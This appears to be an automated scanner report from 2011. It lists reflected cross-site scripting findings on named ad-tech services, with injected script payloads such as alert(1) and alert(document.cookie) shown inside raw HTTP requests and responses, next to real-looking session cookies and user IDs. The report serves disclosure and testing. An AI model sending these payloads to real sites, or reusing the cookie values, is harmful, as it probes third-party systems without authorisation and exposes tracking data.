Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.0 200 OK
Server: IM BidManager
Date: Thu, 03 Feb 2011 19:02:42 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Thu, 03-Feb-2011 19:02:22 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 368
The value of the jpcb request parameter is copied into the HTML document as plain text between tags. The payload d5e7e<script>alert(1)</script>1fda4ce402e was submitted in the jpcb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the jpctx request parameter is copied into the HTML document as plain text between tags. The payload fa896<script>alert(1)</script>11222906e44 was submitted in the jpctx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the apiKey request parameter is copied into the HTML document as plain text between tags. The payload 3767e<script>alert(1)</script>480207bdcb8 was submitted in the apiKey parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /requests?apiKey=c1e69f40-d871-4fed-8266-8c2fb07d10a73767e<script>alert(1)</script>480207bdcb8&jsonpCallback=dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback&jsonpContext=request_442381374318&jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Customers.GetCustomerRequest%22%2C%22payload%22%3A%22%7B%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Customers.GetCustomerRequest%5C%22%7D%22%7D%2C%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Content.GetRelatedAdLinksRequest%22%2C%22payload%22%3A%22%7B%5C%22pageUrl%5C%22%3A%5C%22http%3A//mortgage.ocregister.com/%5C%22%2C%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Content.GetRelatedAdLinksRequest%5C%22%2C%5C%22searchTerm%5C%22%3A%5C%22%5C%22%2C%5C%22returnQueryParams%5C%22%3A%5C%22%5C%22%2C%5C%22reportingDomain%5C%22%3A%5C%22%5C%22%2C%5C%22numberOfSearchLinks%5C%22%3A%5C%225%5C%22%2C%5C%22numberOfResultLinks%5C%22%3A%5C%225%5C%22%2C%5C%22tagsProvider%5C%22%3A%5C%22%5C%22%2C%5C%22matchMethod%5C%22%3A%5C%22smoothedkeywords%5C%22%2C%5C%22articlesTaken%5C%22%3A%5C%2210%5C%22%2C%5C%22articlesThreshold%5C%22%3A%5C%223%5C%22%7D%22%7D%5D%2C%22returnDiagnostics%22%3Afalse%2C%22executeMethod%22%3A%22ExecuteAll%22%2C%22callerSDK%22%3A%22js%3A7315%22%7D HTTP/1.1
Host: pluckit.demandmedia.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=cff8d33d-b33f-4e84-83eb-d9f6a41823a1; BIGipServerPluckit2.Webpool-80=908461834.20480.0000
Response
HTTP/1.1 200 OK
Cache-Control: public, must-revalidate
Pragma: PluckOnDemandApiRev=7315
Content-Length: 920
Content-Type: application/json; charset=utf-8
Expires: Thu, 03 Feb 2011 19:03:22 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml?apiKey=00000000-0000-0000-0000-000000000000", CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Thu, 03 Feb 2011 19:03:22 GMT
The value of the jsonpCallback request parameter is copied into the HTML document as plain text between tags. The payload 546ff<script>alert(1)</script>aa268e625b5 was submitted in the jsonpCallback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /requests?apiKey=c1e69f40-d871-4fed-8266-8c2fb07d10a7&jsonpCallback=dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback546ff<script>alert(1)</script>aa268e625b5&jsonpContext=request_442381374318&jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Customers.GetCustomerRequest%22%2C%22payload%22%3A%22%7B%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Customers.GetCustomerRequest%5C%22%7D%22%7D%2C%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Content.GetRelatedAdLinksRequest%22%2C%22payload%22%3A%22%7B%5C%22pageUrl%5C%22%3A%5C%22http%3A//mortgage.ocregister.com/%5C%22%2C%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Content.GetRelatedAdLinksRequest%5C%22%2C%5C%22searchTerm%5C%22%3A%5C%22%5C%22%2C%5C%22returnQueryParams%5C%22%3A%5C%22%5C%22%2C%5C%22reportingDomain%5C%22%3A%5C%22%5C%22%2C%5C%22numberOfSearchLinks%5C%22%3A%5C%225%5C%22%2C%5C%22numberOfResultLinks%5C%22%3A%5C%225%5C%22%2C%5C%22tagsProvider%5C%22%3A%5C%22%5C%22%2C%5C%22matchMethod%5C%22%3A%5C%22smoothedkeywords%5C%22%2C%5C%22articlesTaken%5C%22%3A%5C%2210%5C%22%2C%5C%22articlesThreshold%5C%22%3A%5C%223%5C%22%7D%22%7D%5D%2C%22returnDiagnostics%22%3Afalse%2C%22executeMethod%22%3A%22ExecuteAll%22%2C%22callerSDK%22%3A%22js%3A7315%22%7D HTTP/1.1
Host: pluckit.demandmedia.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=cff8d33d-b33f-4e84-83eb-d9f6a41823a1; BIGipServerPluckit2.Webpool-80=908461834.20480.0000
Response
HTTP/1.1 200 OK
Cache-Control: public, must-revalidate
Pragma: PluckOnDemandApiRev=7315
Content-Length: 4368
Content-Type: application/json; charset=utf-8
Expires: Thu, 03 Feb 2011 19:03:26 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml?apiKey=00000000-0000-0000-0000-000000000000", CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Thu, 03 Feb 2011 19:03:25 GMT
The value of the jsonpContext request parameter is copied into the HTML document as plain text between tags. The payload 6b2fe<script>alert(1)</script>7d41626bf96 was submitted in the jsonpContext parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /requests?apiKey=c1e69f40-d871-4fed-8266-8c2fb07d10a7&jsonpCallback=dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback&jsonpContext=request_4423813743186b2fe<script>alert(1)</script>7d41626bf96&jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Customers.GetCustomerRequest%22%2C%22payload%22%3A%22%7B%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Customers.GetCustomerRequest%5C%22%7D%22%7D%2C%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Content.GetRelatedAdLinksRequest%22%2C%22payload%22%3A%22%7B%5C%22pageUrl%5C%22%3A%5C%22http%3A//mortgage.ocregister.com/%5C%22%2C%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Content.GetRelatedAdLinksRequest%5C%22%2C%5C%22searchTerm%5C%22%3A%5C%22%5C%22%2C%5C%22returnQueryParams%5C%22%3A%5C%22%5C%22%2C%5C%22reportingDomain%5C%22%3A%5C%22%5C%22%2C%5C%22numberOfSearchLinks%5C%22%3A%5C%225%5C%22%2C%5C%22numberOfResultLinks%5C%22%3A%5C%225%5C%22%2C%5C%22tagsProvider%5C%22%3A%5C%22%5C%22%2C%5C%22matchMethod%5C%22%3A%5C%22smoothedkeywords%5C%22%2C%5C%22articlesTaken%5C%22%3A%5C%2210%5C%22%2C%5C%22articlesThreshold%5C%22%3A%5C%223%5C%22%7D%22%7D%5D%2C%22returnDiagnostics%22%3Afalse%2C%22executeMethod%22%3A%22ExecuteAll%22%2C%22callerSDK%22%3A%22js%3A7315%22%7D HTTP/1.1
Host: pluckit.demandmedia.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=cff8d33d-b33f-4e84-83eb-d9f6a41823a1; BIGipServerPluckit2.Webpool-80=908461834.20480.0000
Response
HTTP/1.1 200 OK
Cache-Control: public, must-revalidate
Pragma: PluckOnDemandApiRev=7315
Content-Length: 4388
Content-Type: application/json; charset=utf-8
Expires: Thu, 03 Feb 2011 19:03:29 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml?apiKey=00000000-0000-0000-0000-000000000000", CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Thu, 03 Feb 2011 19:03:28 GMT
The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6506f"><script>alert(1)</script>91c27bc8e67 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /server/pixel.htm?fpid=6506f"><script>alert(1)</script>91c27bc8e67&sp=y&admeld_call_type=iframe&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: r.turn.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_atf?t=1296754761812&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adImpCount=oh0PP3N04fRnBd11giaMRn0GaIuFFc6KU0t95Ihox42Y481wEkFtGX7HudJA1SwJCBsZxoRT6EzfAaBOxC9wKTt4volhK1SKMMEXrRaSQRZi9OYrtG-b0iAWL5Sg__z6Mu5dojwn5g9wbHIYb9itxx7GYSyR957eDlUpeFx78rhPAxXzEzYUFqdsvXkuFIOa3SJBwxhTK9UwlXAscYO_M4PWvpR2lvg2CTziw80-4erd7x2ac5D5zjijBHgETImH6J7mzrOj8gbZmvqalfHq1zOWaaEkLYgoCjpzZqrIOb4Fr-22QJE64x-hU4KLgyMywYPBSo2jlvAF8lq_IygKlasFwtDx2lJttCmO3ikXUoRriPGYYJIwMnnp0drU0iPKrDDCOXkqJdp6fs-m5LFp06AT3l7X8Fu562OsS_bZq3w-94h_yPZdjrrVWBfP28qvw5g9aOhI5RNPyE9rahUCbt3lzlA6-E_XLXUwKlz8M8Rge-axmvL7QRbbVTcWH_69gNe7Lp99y-WLm2CQwebhsP78DoTX-MltELREBCeeahldH37m3WrGWRs0rxyrhTIvfNDSBptsBfTCIkNpNIZ-estuyxh9bLEhi_2rYF-v3jU-PyGR7zYZKkURVc4VktqypCu6kLg-kmXa4JYXwL5SDme2jKGznyNxnorhkYhuuyfTrtrFY_vsI0N2lko9YuVLMugtX4JGvQuQNrdCkfnoNLQy3HrDk_mqO0a-EdfNtHhVS8ISxl2FC-QxoYM1dFQriDP20OwUBwmVn04CK7SdmOrNneCQeM0Mtq9X6LYgOadpuC766m5RMjVQV9XDrztlefh7m2CDoV_VGAxZRTmH65-iEOjj626Xr9a4PyPR4yMPDZSQiR8N05VXl8Kl5CF5wYPBSo2jlvAF8lq_IygKlQ4AcvxicaQ0QJv3A-NEwrP_vYlQQcTfv4G9VvPeZUwSrDDCOXkqJdp6fs-m5LFp05G3ZVFVoXjdVnl7Wbi3hO0-94h_yPZdjrrVWBfP28qvxkUWUDF6X3KpqQdl41aNM0RM74xthkDRQvK455LrVCLLNoiMiQCbY7XGffLYXA_SuLQTgLh8g9Qs477VuC83If78DoTX-MltELREBC
eeahlgVK-gLzc7v3bufMT3ciwRPOq7W_c7yCEewncWyerLNirskINCTJZ2w2X1u_Ffr45hIaHa_H76oN5ioqf3DUNypCu6kLg-kmXa4JYXwL5SDgVZpbAYwmSs52tJ3ph4JCMa2L50HxvswuEv77HCRTvKMugtX4JGvQuQNrdCkfnoNG4mlIa-6dAvewF741vW4jhVS8ISxl2FC-QxoYM1dFQrs_FmoMnxSVp_tZOCUusIKmakJ6Zxx4MaHG4qowJX52cdsqn6EbbEHzpw1cahm_ednSAyZag0hguPHBGDv4D0F89cj7I3Xm3rPyyOvzQMcybDLE8i5ZewRD7RValSE2YFn6IQ6OPrbpev1rg_I9HjI5ynCo2hqWp8ighHIhRcz2nBg8FKjaOW8AXyWr8jKAqVscXOphesMEv_hKT95FZL-tNurEXc2b78YksLyMCs4H6sMMI5eSol2np-z6bksWnTTE9U8rPoK07OvagfeUFMTT73iH_I9l2OutVYF8_byq_c1Kq7NjC9E9a0eoW9ANcQm2_M-Vs_XiB22OkRMt9wZss2iIyJAJtjtcZ98thcD9J5TC-ggthaT5RIrPMrgXzf_vwOhNf4yW0QtEQEJ55qGc-5cVQ6I7r0sZiLYoBNLt9wJREdAQCGkjhwfIbDh8eKH3liqW8YkScefdM86sUHP_PaiF7fYodG30TCcbE3BCWkK7qQuD6SZdrglhfAvlIOyAmQVZ9Gk9LJN20oRH7d9xucJsk9KwezSI69frNhlnh-VzDUnvD0VSF9GprGKshZpvViBXcPLi1FjMYUJVEbmFVLwhLGXYUL5DGhgzV0VCtu-wgzPw8HAJyjq29STFT-1YYia3j2kAHlFsKaEZ4FVzZEDIrmol-EatT1dqZXDk0mJSx72jjc-JYaXuGhWqtrn6IQ6OPrbpev1rg_I9HjI98tK4Lkd3yYgSLJJRfeUv3Bg8FKjaOW8AXyWr8jKAqVIJgqaELa9gf4ED3OCBald8enkhYgNEwqu2cgvufAu8qsMMI5eSol2np-z6bksWnTbV-gOod-LZDuMZIGw8px0j73iH_I9l2OutVYF8_byq-eWXxP40DPBXd3KCfiOrroHIw5X3-Sh4HUjnsSaxC0epuc0uDxDHt-rTBh2e9nLtgi0gluZrsw7wDK_J5brg91_vwOhNf4yW0QtEQEJ55qGXFlxPVND7eK0NKkmYcNg9jOWDFl6Eb2AIoC5V4JNNKLUZ0sucMJLd08lMBqbvDIPaQ9DijJjsm5f6UC3GKLnVdkeGy8tt3_Zt_zWHCziuKg5syEq3UFt31YVe3zZxRiTrPsbMN1vS3TFG_DmRWjBGoobKMAs1_SjcmCMyMVnnvXgJ4GX4OjUVNjX2CulbPhbYCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgeS-Ii0cHw18f8N_OREqrYbydaelxbY-p8EgzRBPnFKG8nWnpcW2PqfBIM0QT5xShvJ1p6XFtj6nwSDNEE-cUtG5oMP1xzBs04f9aYcpef_h-9zvu-4SLKmRwnyZzNBL4fvc77vuEiypkcJ8mczQS-H73O-77hIsqZHCfJnM0EtFERdyopXzmQlD9vlwvmYOVcj84RfJT-7cTVPiV9xkT9uAa-_yMHADocL3iDyiyA0F0KdTVDhrtMOpab3gV8JpWhzPlVze60NJNLk_VPM-uFocz5Vc3utDSTS5P1TzPrhaHM-VXN7rQ0k0uT9U8z64YjuojwRqay5-ZAaNIzcU3yt_K6BkSAdnJ6PGav_ruqgeixqa40KlkYUwYv6ONa9cufe3IUZ5SPWBETiwrd17lbFsu3zfiF7BPBJIiLSApNR1VhafmVnk6BhX_Sepv3rucGr9Pv9WxoR207LV_JU812XpzTAYSv-BElQmRmwUjrxl6c0wGEr_gRJUJkZsFI68ZenNMBhK_4ESVCZGbBSOvL-FrFoAGy0sFOEtM5Nuv1rHf67HEvueUz
rmEU5VKarK0pFHmk8ureZOA97fEANKtQvhIyyKReEJO7XhpyT2HyIL4SMsikXhCTu14ack9h8i0WpNDrvYk58e1CQBxU9aoW0GgBz7JE6lT1FzCJ5VNfptBoAc-yROpU9RcwieVTX6OyZXhK3RWfu9UgjQxzq_ZTsmV4St0Vn7vVII0Mc6v2U7JleErdFZ-71SCNDHOr9lOyZXhK3RWfu9UgjQxzq_ZVXO01XiSEZlE5C1tJgs0ioM_0RPnIuudzXDvK7K8vPFDP9ET5yLrnc1w7yuyvLzxQz_RE-ci653NcO8rsry88UM_0RPnIuudzXDvK7K8vPFdLmcsxIHfv-CcNp2nsZsDDJxgXJI7GH1VuUBYoyz48YycYFySOxh9VblAWKMs-PGv29VFO9u1uo-sTqh6dCOpkhLk4ViUsMPsWwjDbC_pXdIS5OFYlLDD7FsIw2wv6V3SEuThWJSww-xbCMNsL-ld3iOttRS0QEfXzzQ32Qakh0VYOKF3X7wdD8Dnz7l4C4j; fc=dwiJhIujIVbWqBI35CB1OVbkGHNm9MZWojpB1E5U-cOGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOe2yqvnTRFFJZ0ii36dSFkNQ; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15003%7C15001%7C15001%7C15001%7C15001%7C15003%7C15003%7C14983%7C15003%7C15003; rv=1; pf=vYlmmNe4wlXMju21sv8E9BbQtqzBjZadwYr3eEaEEdXu2q8_Jo62qDoNU1sRcsTDMLxOqe5U8OfgCnbpqI2ApX4lLZyvKs0UYrWi2iSsDx65o3Pzwoz6403H7SSItm-xFnOkZRhnTAf1OsSeg86x6N9he2SzgZbMiSxi7XoC0oDOTz_hW1W1inw2PPTXkr5M6IAD_gZxI523_TIIsV7tK-AIolHB94EOuCprrHzPsXFXUf33lMkSWcP-I3s4DQm5; uid=3011330574290390485
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Tue, 02-Aug-2011 19:03:00 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 19:02:59 GMT
Content-Length: 377
The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38030"><script>alert(1)</script>3e8a29e1991 was submitted in the sp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /server/pixel.htm?fpid=4&sp=38030"><script>alert(1)</script>3e8a29e1991&admeld_call_type=iframe&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: r.turn.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_atf?t=1296754761812&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adImpCount=oh0PP3N04fRnBd11giaMRn0GaIuFFc6KU0t95Ihox42Y481wEkFtGX7HudJA1SwJCBsZxoRT6EzfAaBOxC9wKTt4volhK1SKMMEXrRaSQRZi9OYrtG-b0iAWL5Sg__z6Mu5dojwn5g9wbHIYb9itxx7GYSyR957eDlUpeFx78rhPAxXzEzYUFqdsvXkuFIOa3SJBwxhTK9UwlXAscYO_M4PWvpR2lvg2CTziw80-4erd7x2ac5D5zjijBHgETImH6J7mzrOj8gbZmvqalfHq1zOWaaEkLYgoCjpzZqrIOb4Fr-22QJE64x-hU4KLgyMywYPBSo2jlvAF8lq_IygKlasFwtDx2lJttCmO3ikXUoRriPGYYJIwMnnp0drU0iPKrDDCOXkqJdp6fs-m5LFp06AT3l7X8Fu562OsS_bZq3w-94h_yPZdjrrVWBfP28qvw5g9aOhI5RNPyE9rahUCbt3lzlA6-E_XLXUwKlz8M8Rge-axmvL7QRbbVTcWH_69gNe7Lp99y-WLm2CQwebhsP78DoTX-MltELREBCeeahldH37m3WrGWRs0rxyrhTIvfNDSBptsBfTCIkNpNIZ-estuyxh9bLEhi_2rYF-v3jU-PyGR7zYZKkURVc4VktqypCu6kLg-kmXa4JYXwL5SDme2jKGznyNxnorhkYhuuyfTrtrFY_vsI0N2lko9YuVLMugtX4JGvQuQNrdCkfnoNLQy3HrDk_mqO0a-EdfNtHhVS8ISxl2FC-QxoYM1dFQriDP20OwUBwmVn04CK7SdmOrNneCQeM0Mtq9X6LYgOadpuC766m5RMjVQV9XDrztlefh7m2CDoV_VGAxZRTmH65-iEOjj626Xr9a4PyPR4yMPDZSQiR8N05VXl8Kl5CF5wYPBSo2jlvAF8lq_IygKlQ4AcvxicaQ0QJv3A-NEwrP_vYlQQcTfv4G9VvPeZUwSrDDCOXkqJdp6fs-m5LFp05G3ZVFVoXjdVnl7Wbi3hO0-94h_yPZdjrrVWBfP28qvxkUWUDF6X3KpqQdl41aNM0RM74xthkDRQvK455LrVCLLNoiMiQCbY7XGffLYXA_SuLQTgLh8g9Qs477VuC83If78DoTX-MltELREBC
eeahlgVK-gLzc7v3bufMT3ciwRPOq7W_c7yCEewncWyerLNirskINCTJZ2w2X1u_Ffr45hIaHa_H76oN5ioqf3DUNypCu6kLg-kmXa4JYXwL5SDgVZpbAYwmSs52tJ3ph4JCMa2L50HxvswuEv77HCRTvKMugtX4JGvQuQNrdCkfnoNG4mlIa-6dAvewF741vW4jhVS8ISxl2FC-QxoYM1dFQrs_FmoMnxSVp_tZOCUusIKmakJ6Zxx4MaHG4qowJX52cdsqn6EbbEHzpw1cahm_ednSAyZag0hguPHBGDv4D0F89cj7I3Xm3rPyyOvzQMcybDLE8i5ZewRD7RValSE2YFn6IQ6OPrbpev1rg_I9HjI5ynCo2hqWp8ighHIhRcz2nBg8FKjaOW8AXyWr8jKAqVscXOphesMEv_hKT95FZL-tNurEXc2b78YksLyMCs4H6sMMI5eSol2np-z6bksWnTTE9U8rPoK07OvagfeUFMTT73iH_I9l2OutVYF8_byq_c1Kq7NjC9E9a0eoW9ANcQm2_M-Vs_XiB22OkRMt9wZss2iIyJAJtjtcZ98thcD9J5TC-ggthaT5RIrPMrgXzf_vwOhNf4yW0QtEQEJ55qGc-5cVQ6I7r0sZiLYoBNLt9wJREdAQCGkjhwfIbDh8eKH3liqW8YkScefdM86sUHP_PaiF7fYodG30TCcbE3BCWkK7qQuD6SZdrglhfAvlIOyAmQVZ9Gk9LJN20oRH7d9xucJsk9KwezSI69frNhlnh-VzDUnvD0VSF9GprGKshZpvViBXcPLi1FjMYUJVEbmFVLwhLGXYUL5DGhgzV0VCtu-wgzPw8HAJyjq29STFT-1YYia3j2kAHlFsKaEZ4FVzZEDIrmol-EatT1dqZXDk0mJSx72jjc-JYaXuGhWqtrn6IQ6OPrbpev1rg_I9HjI98tK4Lkd3yYgSLJJRfeUv3Bg8FKjaOW8AXyWr8jKAqVIJgqaELa9gf4ED3OCBald8enkhYgNEwqu2cgvufAu8qsMMI5eSol2np-z6bksWnTbV-gOod-LZDuMZIGw8px0j73iH_I9l2OutVYF8_byq-eWXxP40DPBXd3KCfiOrroHIw5X3-Sh4HUjnsSaxC0epuc0uDxDHt-rTBh2e9nLtgi0gluZrsw7wDK_J5brg91_vwOhNf4yW0QtEQEJ55qGXFlxPVND7eK0NKkmYcNg9jOWDFl6Eb2AIoC5V4JNNKLUZ0sucMJLd08lMBqbvDIPaQ9DijJjsm5f6UC3GKLnVdkeGy8tt3_Zt_zWHCziuKg5syEq3UFt31YVe3zZxRiTrPsbMN1vS3TFG_DmRWjBGoobKMAs1_SjcmCMyMVnnvXgJ4GX4OjUVNjX2CulbPhbYCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgeS-Ii0cHw18f8N_OREqrYbydaelxbY-p8EgzRBPnFKG8nWnpcW2PqfBIM0QT5xShvJ1p6XFtj6nwSDNEE-cUtG5oMP1xzBs04f9aYcpef_h-9zvu-4SLKmRwnyZzNBL4fvc77vuEiypkcJ8mczQS-H73O-77hIsqZHCfJnM0EtFERdyopXzmQlD9vlwvmYOVcj84RfJT-7cTVPiV9xkT9uAa-_yMHADocL3iDyiyA0F0KdTVDhrtMOpab3gV8JpWhzPlVze60NJNLk_VPM-uFocz5Vc3utDSTS5P1TzPrhaHM-VXN7rQ0k0uT9U8z64YjuojwRqay5-ZAaNIzcU3yt_K6BkSAdnJ6PGav_ruqgeixqa40KlkYUwYv6ONa9cufe3IUZ5SPWBETiwrd17lbFsu3zfiF7BPBJIiLSApNR1VhafmVnk6BhX_Sepv3rucGr9Pv9WxoR207LV_JU812XpzTAYSv-BElQmRmwUjrxl6c0wGEr_gRJUJkZsFI68ZenNMBhK_4ESVCZGbBSOvL-FrFoAGy0sFOEtM5Nuv1rHf67HEvueUz
rmEU5VKarK0pFHmk8ureZOA97fEANKtQvhIyyKReEJO7XhpyT2HyIL4SMsikXhCTu14ack9h8i0WpNDrvYk58e1CQBxU9aoW0GgBz7JE6lT1FzCJ5VNfptBoAc-yROpU9RcwieVTX6OyZXhK3RWfu9UgjQxzq_ZTsmV4St0Vn7vVII0Mc6v2U7JleErdFZ-71SCNDHOr9lOyZXhK3RWfu9UgjQxzq_ZVXO01XiSEZlE5C1tJgs0ioM_0RPnIuudzXDvK7K8vPFDP9ET5yLrnc1w7yuyvLzxQz_RE-ci653NcO8rsry88UM_0RPnIuudzXDvK7K8vPFdLmcsxIHfv-CcNp2nsZsDDJxgXJI7GH1VuUBYoyz48YycYFySOxh9VblAWKMs-PGv29VFO9u1uo-sTqh6dCOpkhLk4ViUsMPsWwjDbC_pXdIS5OFYlLDD7FsIw2wv6V3SEuThWJSww-xbCMNsL-ld3iOttRS0QEfXzzQ32Qakh0VYOKF3X7wdD8Dnz7l4C4j; fc=dwiJhIujIVbWqBI35CB1OVbkGHNm9MZWojpB1E5U-cOGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOe2yqvnTRFFJZ0ii36dSFkNQ; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15003%7C15001%7C15001%7C15001%7C15001%7C15003%7C15003%7C14983%7C15003%7C15003; rv=1; 